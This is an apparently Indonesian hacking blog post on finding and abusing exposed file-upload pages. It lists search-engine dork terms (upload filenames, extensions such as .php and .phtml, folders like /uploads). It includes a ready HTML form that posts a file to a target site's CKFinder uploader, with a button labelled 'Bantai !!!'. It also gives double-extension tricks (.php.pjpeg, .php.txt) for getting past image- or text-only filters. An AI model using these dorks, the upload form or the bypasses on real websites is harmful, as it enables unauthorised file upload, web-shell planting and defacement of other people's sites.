DORK Upload file Vulnerability

Bahan²

– Dork * upload.html

* Upload.htm

* Upload.php

* Upload.phtml

* Uploads.html

* Uploads.php 

<html >
<head>
    <title>./75n1</title>
</head>
<body>
<center>
<p style=”font-weight:bold”>Ustazah</p>
<img src=”http://i.imgur.com/fl2HqAw.jpg” alt=”gambar” class=”bg” />
<br><br>
<form method=”POST” action=”http://target.com.net/admin/app/webroot/plugin/ckeditor/ckfinder/ckfinder.html”
enctype=”multipart/form-data”>
<input type=”file” name=”Filedata” /><button> Bantai !!!</button>
</form></center>
</body>
</html>

copy.html 

kalau belum punya

Bahan² untuk racik dork :

Filename :

– upload

– uploader

– uploadfile

– upload_file

– uploadform

– upload_form

– formupload

– form_upload

– fileupload

– file_upload

– fileuploader

– file_uploader

* Tambahin lagi kalo ada

File extension :

– .htm

– .html

– .php

– .phtml

– .asp

– .aspx

– .cgi

* Tambahin lagi kalo ada

Access folder :

– /upload

– /uploads

– /file

– /files

* Tambahin lagi kalo ada

Note :
kalo ketemu uploader yang JPEG, TXT itu jangan di skip,
biasanya bisa di bypass, .php.pjpeg, .php.txt

Facebook Comments

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *